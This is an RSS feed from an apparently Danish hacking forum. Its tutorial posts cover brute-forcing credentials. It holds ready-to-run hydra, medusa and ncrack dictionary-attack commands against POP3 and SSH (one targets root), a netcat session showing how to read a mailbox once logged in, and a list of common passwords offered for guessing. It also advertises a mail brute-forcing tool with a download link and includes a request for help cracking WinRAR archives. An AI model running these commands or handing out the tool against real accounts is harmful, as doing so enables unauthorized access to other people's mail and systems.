<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:dc="http://purl.org/dc/elements/1.1/">
	<channel>
		<title><![CDATA[Shellsec - Vejledninger]]></title>
		<link>https://www.shellsec.pw/</link>
		<description><![CDATA[Shellsec - https://www.shellsec.pw]]></description>
		<pubDate>Fri, 17 Apr 2026 03:18:05 +0000</pubDate>
		<generator>MyBB</generator>
		<item>
			<title><![CDATA[All Mail Brute]]></title>
			<link>https://www.shellsec.pw/traad-all-mail-brute</link>
			<pubDate>Sun, 06 Oct 2019 17:13:04 +0200</pubDate>
			<guid isPermaLink="false">https://www.shellsec.pw/traad-all-mail-brute</guid>
			<description><![CDATA[<img src="https://cache.nulled.to/3d8c563e48b989b925410f02496d3b57b445935d/?url=https%3A%2F%2Fi.ibb.co%2FHYqhj3g%2Fbbc523e77096.jpg" alt="[Billede: ?url=https%3A%2F%2Fi.ibb.co%2FHYqhj3g%2F...e77096.jpg]" class="mycode_img" /><br />
<br />
<span style="color: #afafaf;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Roboto, sans-serif;" class="mycode_font">1. Improved search algorithm of the product</span></span></span><br />
<span style="color: #afafaf;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Roboto, sans-serif;" class="mycode_font">2. Redesigned email search, now works on all domains<br />
3. Work with base: or; if mixed it will automatically detect</span></span></span><br />
<span style="color: #afafaf;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Roboto, sans-serif;" class="mycode_font"> <br />
</span></span></span><a href="https://www.virustotal.com/gui/file/b0f1bb8b236888e715ac59c3dc23279415b8b71ce633de25b133bc70db1a92c5/detection" target="_blank" rel="noopener" class="mycode_url">https://www.virustotal.com/gui/file/b0f1.../detection</a><br />
<a href="https://mega.nz/#!MqhFWIAL!u7rD8N752CtWnvpn6AaW36GkT04EqUPvC9cemnZHPMM" target="_blank" rel="noopener" class="mycode_url">https://mega.nz/#!MqhFWIAL!u7rD8N752CtWn...9cemnZHPMM</a>]]></description>
			<content:encoded><![CDATA[<img src="https://cache.nulled.to/3d8c563e48b989b925410f02496d3b57b445935d/?url=https%3A%2F%2Fi.ibb.co%2FHYqhj3g%2Fbbc523e77096.jpg" alt="[Billede: ?url=https%3A%2F%2Fi.ibb.co%2FHYqhj3g%2F...e77096.jpg]" class="mycode_img" /><br />
<br />
<span style="color: #afafaf;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Roboto, sans-serif;" class="mycode_font">1. Improved search algorithm of the product</span></span></span><br />
<span style="color: #afafaf;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Roboto, sans-serif;" class="mycode_font">2. Redesigned email search, now works on all domains<br />
3. Work with base: or; if mixed it will automatically detect</span></span></span><br />
<span style="color: #afafaf;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Roboto, sans-serif;" class="mycode_font"> <br />
</span></span></span><a href="https://www.virustotal.com/gui/file/b0f1bb8b236888e715ac59c3dc23279415b8b71ce633de25b133bc70db1a92c5/detection" target="_blank" rel="noopener" class="mycode_url">https://www.virustotal.com/gui/file/b0f1.../detection</a><br />
<a href="https://mega.nz/#!MqhFWIAL!u7rD8N752CtWnvpn6AaW36GkT04EqUPvC9cemnZHPMM" target="_blank" rel="noopener" class="mycode_url">https://mega.nz/#!MqhFWIAL!u7rD8N752CtWn...9cemnZHPMM</a>]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[POP3 Dictionary Attack - Miniguide med Ncrack/Medusa/Hydra]]></title>
			<link>https://www.shellsec.pw/traad-pop3-dictionary-attack-miniguide-med</link>
			<pubDate>Sun, 24 May 2015 14:19:43 +0200</pubDate>
			<guid isPermaLink="false">https://www.shellsec.pw/traad-pop3-dictionary-attack-miniguide-med</guid>
			<description><![CDATA[<span style="font-weight: bold;" class="mycode_b">Mål:</span><br />
Målet er at få adgang til en mailbox. Enten for at læse mails i postkassen, eller måske for at kontrollere om brugeren har et dårligt password.<br />
<br />
Der findes flere værktøjer til dette. Her under Ncrack, Medusa og Hydra. Nogle er bedre end andre. Min personlige erfaring siger mig, Ncrack klart er mest stabil og effektiv.<br />
Jeg har utallige gange været ude for, at de andre crasher efter 15-20 minutter, eller at ikke alle de passwords der er i den password list man bruger, bliver testet. Dette resulterer i, koden ikke bliver fundet, selv om den er i passord listen.<br />
<br />
<span style="font-weight: bold;" class="mycode_b">Eksempler:</span><br />
<blockquote class="mycode_quote"><cite>Citer:</cite>hydra -l &lt;username&gt; -P &lt;password list&gt; -v &lt;target ip&gt; -s 110 pop3<br />
# hydra -l postmaster -P /usr/share/wordlists/password.lst -v &lt;ip&gt; -s 110 pop3</blockquote>
<br />
<blockquote class="mycode_quote"><cite>Citer:</cite>medusa -h &lt;target ip&gt; -u &lt;username&gt; -P &lt;password list&gt; -M pop3 -f<br />
# medusa -h &lt;ip&gt; -u postmaster -P /usr/share/wordlists/password.lst -M pop3 -f</blockquote>
<br />
<blockquote class="mycode_quote"><cite>Citer:</cite>ncrack --user &lt;username&gt; -p pop3 -P &lt;password list&gt; &lt;target ip&gt;:110<br />
# ncrack --user postmaster -p pop3 -P /usr/share/wordlists/password.lst --connection-limit 10 &lt;ip&gt;:110</blockquote>
<br />
Alternativt kan man selvfølgelig lave sit eget script. Der skal fatisk ikke så meget til.<br />
Disse tre værktøjer har også yderligere options, man kan give. Enten for at være lidt mere aggresiv/diskret, eller for at få et dictionary attack til at gå lidt hurtigere. Man skal selvfølgelig huske, man også kan risikere at overbelaste serveren, man arbejder på. Man kan i nogle tilfælde også risikere at få spærret den eller de brugere, man arbejder på.<br />
<br />
<span style="font-weight: bold;" class="mycode_b">Lidt om POP3:</span><br />
Når man skal logge ind på en POP3 server, starter man i "AUTHORIZATION" fasen, hvor brugeren identificerer sig selv:<br />
Man sender først en USER kommando, som angiver brugernavnet, og så en PASS kommando, som angiver koden.<br />
Serveren svarer så tilbage med "+OK ...", hvis kommandoen er i orden, eller "+ERR ..." hvis det ikke gik godt.<br />
<blockquote class="mycode_quote"><cite>Citer:</cite>C: USER &lt;brugernavn&gt;<br />
S: +OK/-ERR<br />
C: PASS &lt;kodeord&gt;<br />
S: +OK/-ERR</blockquote>
<br />
Hvis både USER og PASS kommandoen går godt, ryger man i "TRANSACTION" fasen.<br />
Her kan man udføre flere forskellige kommandoer. De mest interessante kommandoer er nok LIST og RETR kommandoerne.<br />
LIST viser en liste over mails for den postkasse man er i. RETR henter så en udvalgt mail.<br />
<br />
Her er et eksempel. Jeg har klippet lidt af outputtet væk, for selve emailen er ikke så interessant i sig selv.<br />
<blockquote class="mycode_quote"><cite>Citer:</cite>root@master:~# nc -nv 10.0.2.22 110<br />
(UNKNOWN) [10.0.2.22] 110 (pop3) open<br />
+OK POPFuzz v1.0 Server Ready (Shellsec.pw)<br />
<span style="font-weight: bold;" class="mycode_b">USER postmaster</span><br />
+OK postmaster is hanging out here<br />
<span style="font-weight: bold;" class="mycode_b">PASS ********</span><br />
+OK postmaster is now authorized<br />
<span style="font-weight: bold;" class="mycode_b">LIST</span><br />
+OK 1 messages (1144 octets)<br />
1 1144<br />
.<br />
<span style="font-weight: bold;" class="mycode_b">RETR 1</span><br />
+OK 1144 octets<br />
Return-Path: &lt;no-reply@example.com&gt;<br />
Delivered-To: postmaster@shellsec.pw<br />
Received: from localhost (unknown [10.1.3.25])<br />
        by harmony.local (Postfix) with ESMTP id 2CC88637E2<br />
        for &lt;postmaster@shellsec.pw&gt;; Wed, 13 May 2015 10:02:52 +0200 (CEST)<br />
To: postmaster@shellsec.pw<br />
Subject: Hello<br />
.......<br />
--b1_5ecf0dd9b89ef5875fcc3e3ead24e962<br />
Content-Type: text/plain; format=flowed; charset="UTF-8"<br />
Content-Transfer-Encoding: 8bit<br />
<br />
Hey<br />
.......<br />
<br />
--b1_5ecf0dd9b89ef5875fcc3e3ead24e962--<br />
.<br />
<span style="font-weight: bold;" class="mycode_b">QUIT</span><br />
+OK leaving<br />
root@master:~#</blockquote>
<br />
<span style="font-weight: bold;" class="mycode_b">Mere:</span><br />
Der er en del information at hente i diverse POP3 RFCer.<br />
Bemærk at nogle postservere forventer hele email adressen som brugernavn.<br />
<br />
<span style="font-weight: bold;" class="mycode_b">Links:</span><br />
<a href="http://nmap.org/ncrack/man.html" target="_blank" rel="noopener" class="mycode_url">ncrack</a><br />
<a href="http://h.foofus.net/?page_id=51" target="_blank" rel="noopener" class="mycode_url">Medusa</a><br />
<a href="https://www.thc.org/thc-hydra/" target="_blank" rel="noopener" class="mycode_url">Hydra</a><br />
<a href="https://tools.ietf.org/html/rfc1460" target="_blank" rel="noopener" class="mycode_url">https://tools.ietf.org/html/rfc1460</a><br />
<a href="https://tools.ietf.org/html/rfc1725" target="_blank" rel="noopener" class="mycode_url">https://tools.ietf.org/html/rfc1725</a><br />
<a href="https://tools.ietf.org/html/rfc1939" target="_blank" rel="noopener" class="mycode_url">https://tools.ietf.org/html/rfc1939</a><br />
<a href="https://tools.ietf.org/html/rfc2449" target="_blank" rel="noopener" class="mycode_url">https://tools.ietf.org/html/rfc2449</a><br />
Bemærk at der findes rigtig mange RFCer til POP3. Se efter de nyeste du kan finde.]]></description>
			<content:encoded><![CDATA[<span style="font-weight: bold;" class="mycode_b">Mål:</span><br />
Målet er at få adgang til en mailbox. Enten for at læse mails i postkassen, eller måske for at kontrollere om brugeren har et dårligt password.<br />
<br />
Der findes flere værktøjer til dette. Her under Ncrack, Medusa og Hydra. Nogle er bedre end andre. Min personlige erfaring siger mig, Ncrack klart er mest stabil og effektiv.<br />
Jeg har utallige gange været ude for, at de andre crasher efter 15-20 minutter, eller at ikke alle de passwords der er i den password list man bruger, bliver testet. Dette resulterer i, koden ikke bliver fundet, selv om den er i passord listen.<br />
<br />
<span style="font-weight: bold;" class="mycode_b">Eksempler:</span><br />
<blockquote class="mycode_quote"><cite>Citer:</cite>hydra -l &lt;username&gt; -P &lt;password list&gt; -v &lt;target ip&gt; -s 110 pop3<br />
# hydra -l postmaster -P /usr/share/wordlists/password.lst -v &lt;ip&gt; -s 110 pop3</blockquote>
<br />
<blockquote class="mycode_quote"><cite>Citer:</cite>medusa -h &lt;target ip&gt; -u &lt;username&gt; -P &lt;password list&gt; -M pop3 -f<br />
# medusa -h &lt;ip&gt; -u postmaster -P /usr/share/wordlists/password.lst -M pop3 -f</blockquote>
<br />
<blockquote class="mycode_quote"><cite>Citer:</cite>ncrack --user &lt;username&gt; -p pop3 -P &lt;password list&gt; &lt;target ip&gt;:110<br />
# ncrack --user postmaster -p pop3 -P /usr/share/wordlists/password.lst --connection-limit 10 &lt;ip&gt;:110</blockquote>
<br />
Alternativt kan man selvfølgelig lave sit eget script. Der skal fatisk ikke så meget til.<br />
Disse tre værktøjer har også yderligere options, man kan give. Enten for at være lidt mere aggresiv/diskret, eller for at få et dictionary attack til at gå lidt hurtigere. Man skal selvfølgelig huske, man også kan risikere at overbelaste serveren, man arbejder på. Man kan i nogle tilfælde også risikere at få spærret den eller de brugere, man arbejder på.<br />
<br />
<span style="font-weight: bold;" class="mycode_b">Lidt om POP3:</span><br />
Når man skal logge ind på en POP3 server, starter man i "AUTHORIZATION" fasen, hvor brugeren identificerer sig selv:<br />
Man sender først en USER kommando, som angiver brugernavnet, og så en PASS kommando, som angiver koden.<br />
Serveren svarer så tilbage med "+OK ...", hvis kommandoen er i orden, eller "+ERR ..." hvis det ikke gik godt.<br />
<blockquote class="mycode_quote"><cite>Citer:</cite>C: USER &lt;brugernavn&gt;<br />
S: +OK/-ERR<br />
C: PASS &lt;kodeord&gt;<br />
S: +OK/-ERR</blockquote>
<br />
Hvis både USER og PASS kommandoen går godt, ryger man i "TRANSACTION" fasen.<br />
Her kan man udføre flere forskellige kommandoer. De mest interessante kommandoer er nok LIST og RETR kommandoerne.<br />
LIST viser en liste over mails for den postkasse man er i. RETR henter så en udvalgt mail.<br />
<br />
Her er et eksempel. Jeg har klippet lidt af outputtet væk, for selve emailen er ikke så interessant i sig selv.<br />
<blockquote class="mycode_quote"><cite>Citer:</cite>root@master:~# nc -nv 10.0.2.22 110<br />
(UNKNOWN) [10.0.2.22] 110 (pop3) open<br />
+OK POPFuzz v1.0 Server Ready (Shellsec.pw)<br />
<span style="font-weight: bold;" class="mycode_b">USER postmaster</span><br />
+OK postmaster is hanging out here<br />
<span style="font-weight: bold;" class="mycode_b">PASS ********</span><br />
+OK postmaster is now authorized<br />
<span style="font-weight: bold;" class="mycode_b">LIST</span><br />
+OK 1 messages (1144 octets)<br />
1 1144<br />
.<br />
<span style="font-weight: bold;" class="mycode_b">RETR 1</span><br />
+OK 1144 octets<br />
Return-Path: &lt;no-reply@example.com&gt;<br />
Delivered-To: postmaster@shellsec.pw<br />
Received: from localhost (unknown [10.1.3.25])<br />
        by harmony.local (Postfix) with ESMTP id 2CC88637E2<br />
        for &lt;postmaster@shellsec.pw&gt;; Wed, 13 May 2015 10:02:52 +0200 (CEST)<br />
To: postmaster@shellsec.pw<br />
Subject: Hello<br />
.......<br />
--b1_5ecf0dd9b89ef5875fcc3e3ead24e962<br />
Content-Type: text/plain; format=flowed; charset="UTF-8"<br />
Content-Transfer-Encoding: 8bit<br />
<br />
Hey<br />
.......<br />
<br />
--b1_5ecf0dd9b89ef5875fcc3e3ead24e962--<br />
.<br />
<span style="font-weight: bold;" class="mycode_b">QUIT</span><br />
+OK leaving<br />
root@master:~#</blockquote>
<br />
<span style="font-weight: bold;" class="mycode_b">Mere:</span><br />
Der er en del information at hente i diverse POP3 RFCer.<br />
Bemærk at nogle postservere forventer hele email adressen som brugernavn.<br />
<br />
<span style="font-weight: bold;" class="mycode_b">Links:</span><br />
<a href="http://nmap.org/ncrack/man.html" target="_blank" rel="noopener" class="mycode_url">ncrack</a><br />
<a href="http://h.foofus.net/?page_id=51" target="_blank" rel="noopener" class="mycode_url">Medusa</a><br />
<a href="https://www.thc.org/thc-hydra/" target="_blank" rel="noopener" class="mycode_url">Hydra</a><br />
<a href="https://tools.ietf.org/html/rfc1460" target="_blank" rel="noopener" class="mycode_url">https://tools.ietf.org/html/rfc1460</a><br />
<a href="https://tools.ietf.org/html/rfc1725" target="_blank" rel="noopener" class="mycode_url">https://tools.ietf.org/html/rfc1725</a><br />
<a href="https://tools.ietf.org/html/rfc1939" target="_blank" rel="noopener" class="mycode_url">https://tools.ietf.org/html/rfc1939</a><br />
<a href="https://tools.ietf.org/html/rfc2449" target="_blank" rel="noopener" class="mycode_url">https://tools.ietf.org/html/rfc2449</a><br />
Bemærk at der findes rigtig mange RFCer til POP3. Se efter de nyeste du kan finde.]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[Bruteforce winrar]]></title>
			<link>https://www.shellsec.pw/traad-bruteforce-winrar</link>
			<pubDate>Thu, 26 Feb 2015 11:19:44 +0100</pubDate>
			<guid isPermaLink="false">https://www.shellsec.pw/traad-bruteforce-winrar</guid>
			<description><![CDATA[Halløj.  Nogle der kan hjælpe mig med at bruteforce låste winrar filer?  :)]]></description>
			<content:encoded><![CDATA[Halløj.  Nogle der kan hjælpe mig med at bruteforce låste winrar filer?  :)]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[Password Liste - mest brugte passwords 2014]]></title>
			<link>https://www.shellsec.pw/traad-password-liste-mest-brugte-passwords</link>
			<pubDate>Wed, 21 Jan 2015 08:53:58 +0100</pubDate>
			<guid isPermaLink="false">https://www.shellsec.pw/traad-password-liste-mest-brugte-passwords</guid>
			<description><![CDATA[Faldt lige over denne liste med mest brugte passwords i 2014 og tænkte at der nok var nogle her inde der måske kunne bruge det ;)<br />
<br />
Sorteret efter mest brugte, altså 123456 er det mest brugte :)<br />
<br />
<blockquote class="mycode_quote"><cite>Citer:</cite>123456<br />
password<br />
12345<br />
12345678 <br />
qwerty <br />
234567890<br />
1234 <br />
baseball<br />
dragon<br />
football<br />
1234567<br />
monkey<br />
letmein<br />
abc123<br />
111111<br />
mustang<br />
access<br />
shadow<br />
master<br />
michael<br />
superman<br />
696969<br />
123123<br />
batman<br />
trustno1</blockquote>
<br />
Credits: <a href="http://mashable.com/2015/01/20/worst-passwords-of-2014/?utm_cid=mash-com-fb-main-link" target="_blank" rel="noopener" class="mycode_url">http://mashable.com/2015/01/20/worst-pas...-main-link</a>]]></description>
			<content:encoded><![CDATA[Faldt lige over denne liste med mest brugte passwords i 2014 og tænkte at der nok var nogle her inde der måske kunne bruge det ;)<br />
<br />
Sorteret efter mest brugte, altså 123456 er det mest brugte :)<br />
<br />
<blockquote class="mycode_quote"><cite>Citer:</cite>123456<br />
password<br />
12345<br />
12345678 <br />
qwerty <br />
234567890<br />
1234 <br />
baseball<br />
dragon<br />
football<br />
1234567<br />
monkey<br />
letmein<br />
abc123<br />
111111<br />
mustang<br />
access<br />
shadow<br />
master<br />
michael<br />
superman<br />
696969<br />
123123<br />
batman<br />
trustno1</blockquote>
<br />
Credits: <a href="http://mashable.com/2015/01/20/worst-passwords-of-2014/?utm_cid=mash-com-fb-main-link" target="_blank" rel="noopener" class="mycode_url">http://mashable.com/2015/01/20/worst-pas...-main-link</a>]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[Sådan finder du ud af hvad slags hash du har!]]></title>
			<link>https://www.shellsec.pw/traad-saadan-finder-du-ud-af-hvad-slags-hash</link>
			<pubDate>Tue, 23 Jul 2013 19:13:36 +0200</pubDate>
			<guid isPermaLink="false">https://www.shellsec.pw/traad-saadan-finder-du-ud-af-hvad-slags-hash</guid>
			<description><![CDATA[Dette her hendvender sig kun til folk med kali linux (backtrack)<br />
skriv det ind der er på billederne og så skulle der gerne ske det samme! <img src="https://www.shellsec.pw/images/smilies/facebook/happy.png" alt="Happy" title="Happy" class="smilie smilie_85" /><br />
<br />
<img src="http://gratisupload.dk/billede/thumb/699298/full/" alt="[Billede: full]" class="mycode_img" /><br />
<img src="http://gratisupload.dk/billede/thumb/699299/full/" alt="[Billede: full]" class="mycode_img" /><br />
<img src="http://gratisupload.dk/billede/thumb/699300/full/" alt="[Billede: full]" class="mycode_img" /><br />
Har i et eller andet? Så fyr det af i tråden! <img src="https://www.shellsec.pw/images/smilies/facebook/happy.png" alt="Happy" title="Happy" class="smilie smilie_85" /><br />
Spagnum påminde os om at han havde lavet den her tråd før! her er hans! <a href="https://www.shellsec.pw/showthread.php?tid=244" target="_blank" rel="noopener" class="mycode_url">https://www.shellsec.pw/showthread.php?tid=244</a><br />
Lycia og Sømanden out.]]></description>
			<content:encoded><![CDATA[Dette her hendvender sig kun til folk med kali linux (backtrack)<br />
skriv det ind der er på billederne og så skulle der gerne ske det samme! <img src="https://www.shellsec.pw/images/smilies/facebook/happy.png" alt="Happy" title="Happy" class="smilie smilie_85" /><br />
<br />
<img src="http://gratisupload.dk/billede/thumb/699298/full/" alt="[Billede: full]" class="mycode_img" /><br />
<img src="http://gratisupload.dk/billede/thumb/699299/full/" alt="[Billede: full]" class="mycode_img" /><br />
<img src="http://gratisupload.dk/billede/thumb/699300/full/" alt="[Billede: full]" class="mycode_img" /><br />
Har i et eller andet? Så fyr det af i tråden! <img src="https://www.shellsec.pw/images/smilies/facebook/happy.png" alt="Happy" title="Happy" class="smilie smilie_85" /><br />
Spagnum påminde os om at han havde lavet den her tråd før! her er hans! <a href="https://www.shellsec.pw/showthread.php?tid=244" target="_blank" rel="noopener" class="mycode_url">https://www.shellsec.pw/showthread.php?tid=244</a><br />
Lycia og Sømanden out.]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[SSH Dictionary attack med Hydra]]></title>
			<link>https://www.shellsec.pw/traad-ssh-dictionary-attack-med-hydra</link>
			<pubDate>Wed, 10 Jul 2013 22:25:38 +0200</pubDate>
			<guid isPermaLink="false">https://www.shellsec.pw/traad-ssh-dictionary-attack-med-hydra</guid>
			<description><![CDATA[Mål: At bruge et Dictionary Attack for at få fat en brugers password.<br />
I dette tilfælde angriber vi root brugeren, da den ikke normalt spærres.<br />
<br />
Jeg har testet dette på Kali, men Backtrack eller anden Linux med Hydra installeret, kan bruges. Bemærk at Kali er den nye version af Backtrack, så en dag, findes Backtrack sikkert ikke mere. Den kan dog installeres på de fleste linux dists. Man kan sikkert compile selv, bruge en tarball eller hente en færdig pakke. Dette gøres med det pakkesystem, der bruges af den aktuelle dist. aptitude, rpm, yast2, yum eller lign. Der findes også en version til windows. <br />
<br />
Hvordan:<br />
"hydra -s 22 -v -V -l victim -P ./password.lst -t 3 -w 10 -f 10.0.0.210 ssh"<br />
<br />
Args:<br />
"-s 22" fortæller Hydra at vi ønsker at connecte på port 22, som oftest er SSH. SSH kan selvfølgelig køres på alverdens porte, og alverdens andre protokoller kan sættes til at lytte på port 22. I dette eksempel, går vi ud fra, vi har lavet et Service Scan først.<br />
<br />
"-v -V" er bare verbose og viser noget ekstra output. Så kan man se hvad der sker, og jeg synes det er interessant i starten. Det gør også at man ser hver enkelt login forsøg. Hvilket brugernavn og hvilken kode, den forsøger.<br />
<br />
"-l victim" fortæller Hydra vi vil logge ind med brugeren "victim". Man kunne også bruge en tekst fil med en liste af brugernavne i stedet, så ville man bare bruge et stort L: "-L ./usernames.txt". Hvis man bruger denne funktion, vil Hydra prøve alle passwords i listen mod den første bruger, så alle passwords mod næste bruger. Her kan det være en god idé at bruge "-u", så den i stedet vil prøve første password, mod alle brugere, så andet password mod alle brugere osv. Men det er en smagssag.<br />
<br />
"-P ./password.lst" angiver hvilken password liste man vil bruge. Der findes flere på både Backtrack og Kali. Denne liste kommer med password crackeren John. Man kan også angive et lille p:"-p qwerty" for, kun at prøve med den ene kode.<br />
<br />
"-t 3" fortæller hvor mange samtidige logins der må laves. Det er lidt trial and error. Hvis forbindelserne begynder at time ud, har man nok sat den for højt. En ældre Cisco router eller switch vil kun have 5 tty linier, så sætter man den højere, er man sikker på, det vil gå galt. Dette vil også gøre det umuligt for en administrator at logge på med SSH. Så det vil kunne sætte nogle alarmer i gang. De nyere har 15 VTY linier. Den er kun sat så lavt hos mig, fordi testen er lavet i Oracle VirtualBox, med begrænsede resosurcer. Jo flere samtidige forsøg, jo hurtigere vil det selvfølgelig gå.<br />
<br />
"-w 10" er bare en timeout. Den kan man også justere så den passer til svartiderne på den host man vil angribe. Der kan jo forekomme noget latency hvis man fra dk, angriber en i et andet land.<br />
<br />
"-f" fortæller Hydre at, den skal stoppe når den finder et match.<br />
De to sidste args, er nogen lunde logiske. Ofrets ip og den protokol vi vil angribe.<br />
<br />
Mere:<br />
Det er ikke alle steder, det tillades at root logger på, uden at være direkte ved maskinen, men har man en bruger på systemet med begrænsede rettigheder, kan man "su" til root, når man først er logget på.<br />
<br />
Hydra kan meget mere end dette. Der er understøttelse af mange andre protokoller end ssh, så det er bare at prøve sig frem. Læs evt.  manualen: "man hydra" eller "info hydra".<br />
Hydra kan også køres i en grafisk udgave som startes med:<br />
"xhydra". Her kan man prøve sig frem. Her kan du også se hvad den egentlige kommando der bliver sendt, ser ud. xHydra er kun et frontend UI.<br />
<br />
Tools:<br />
Hydra - <a href="http://www.thc.org/thc-hydra/" target="_blank" rel="noopener" class="mycode_url">http://www.thc.org/thc-hydra/</a><br />
<br />
Links:<br />
<a href="http://backtrack-linux.org/" target="_blank" rel="noopener" class="mycode_url">http://backtrack-linux.org/</a><br />
<a href="http://www.kali.org/" target="_blank" rel="noopener" class="mycode_url">http://www.kali.org/</a><br />
<br />
<!-- start: postbit_attachments_attachment -->
<br /><!-- start: attachment_icon -->
<img src="https://www.shellsec.pw/images/attachtypes/image.gif" title="PNG Image" border="0" alt=".png" />
<!-- end: attachment_icon -->&nbsp;&nbsp;<a href="attachment.php?aid=5" target="_blank" title="">hydra.png</a> (Størrelse: 201,73 KB / Downloads: 35)
<!-- end: postbit_attachments_attachment -->]]></description>
			<content:encoded><![CDATA[Mål: At bruge et Dictionary Attack for at få fat en brugers password.<br />
I dette tilfælde angriber vi root brugeren, da den ikke normalt spærres.<br />
<br />
Jeg har testet dette på Kali, men Backtrack eller anden Linux med Hydra installeret, kan bruges. Bemærk at Kali er den nye version af Backtrack, så en dag, findes Backtrack sikkert ikke mere. Den kan dog installeres på de fleste linux dists. Man kan sikkert compile selv, bruge en tarball eller hente en færdig pakke. Dette gøres med det pakkesystem, der bruges af den aktuelle dist. aptitude, rpm, yast2, yum eller lign. Der findes også en version til windows. <br />
<br />
Hvordan:<br />
"hydra -s 22 -v -V -l victim -P ./password.lst -t 3 -w 10 -f 10.0.0.210 ssh"<br />
<br />
Args:<br />
"-s 22" fortæller Hydra at vi ønsker at connecte på port 22, som oftest er SSH. SSH kan selvfølgelig køres på alverdens porte, og alverdens andre protokoller kan sættes til at lytte på port 22. I dette eksempel, går vi ud fra, vi har lavet et Service Scan først.<br />
<br />
"-v -V" er bare verbose og viser noget ekstra output. Så kan man se hvad der sker, og jeg synes det er interessant i starten. Det gør også at man ser hver enkelt login forsøg. Hvilket brugernavn og hvilken kode, den forsøger.<br />
<br />
"-l victim" fortæller Hydra vi vil logge ind med brugeren "victim". Man kunne også bruge en tekst fil med en liste af brugernavne i stedet, så ville man bare bruge et stort L: "-L ./usernames.txt". Hvis man bruger denne funktion, vil Hydra prøve alle passwords i listen mod den første bruger, så alle passwords mod næste bruger. Her kan det være en god idé at bruge "-u", så den i stedet vil prøve første password, mod alle brugere, så andet password mod alle brugere osv. Men det er en smagssag.<br />
<br />
"-P ./password.lst" angiver hvilken password liste man vil bruge. Der findes flere på både Backtrack og Kali. Denne liste kommer med password crackeren John. Man kan også angive et lille p:"-p qwerty" for, kun at prøve med den ene kode.<br />
<br />
"-t 3" fortæller hvor mange samtidige logins der må laves. Det er lidt trial and error. Hvis forbindelserne begynder at time ud, har man nok sat den for højt. En ældre Cisco router eller switch vil kun have 5 tty linier, så sætter man den højere, er man sikker på, det vil gå galt. Dette vil også gøre det umuligt for en administrator at logge på med SSH. Så det vil kunne sætte nogle alarmer i gang. De nyere har 15 VTY linier. Den er kun sat så lavt hos mig, fordi testen er lavet i Oracle VirtualBox, med begrænsede resosurcer. Jo flere samtidige forsøg, jo hurtigere vil det selvfølgelig gå.<br />
<br />
"-w 10" er bare en timeout. Den kan man også justere så den passer til svartiderne på den host man vil angribe. Der kan jo forekomme noget latency hvis man fra dk, angriber en i et andet land.<br />
<br />
"-f" fortæller Hydre at, den skal stoppe når den finder et match.<br />
De to sidste args, er nogen lunde logiske. Ofrets ip og den protokol vi vil angribe.<br />
<br />
Mere:<br />
Det er ikke alle steder, det tillades at root logger på, uden at være direkte ved maskinen, men har man en bruger på systemet med begrænsede rettigheder, kan man "su" til root, når man først er logget på.<br />
<br />
Hydra kan meget mere end dette. Der er understøttelse af mange andre protokoller end ssh, så det er bare at prøve sig frem. Læs evt.  manualen: "man hydra" eller "info hydra".<br />
Hydra kan også køres i en grafisk udgave som startes med:<br />
"xhydra". Her kan man prøve sig frem. Her kan du også se hvad den egentlige kommando der bliver sendt, ser ud. xHydra er kun et frontend UI.<br />
<br />
Tools:<br />
Hydra - <a href="http://www.thc.org/thc-hydra/" target="_blank" rel="noopener" class="mycode_url">http://www.thc.org/thc-hydra/</a><br />
<br />
Links:<br />
<a href="http://backtrack-linux.org/" target="_blank" rel="noopener" class="mycode_url">http://backtrack-linux.org/</a><br />
<a href="http://www.kali.org/" target="_blank" rel="noopener" class="mycode_url">http://www.kali.org/</a><br />
<br />
<!-- start: postbit_attachments_attachment -->
<br /><!-- start: attachment_icon -->
<img src="https://www.shellsec.pw/images/attachtypes/image.gif" title="PNG Image" border="0" alt=".png" />
<!-- end: attachment_icon -->&nbsp;&nbsp;<a href="attachment.php?aid=5" target="_blank" title="">hydra.png</a> (Størrelse: 201,73 KB / Downloads: 35)
<!-- end: postbit_attachments_attachment -->]]></content:encoded>
		</item>
	</channel>
</rss>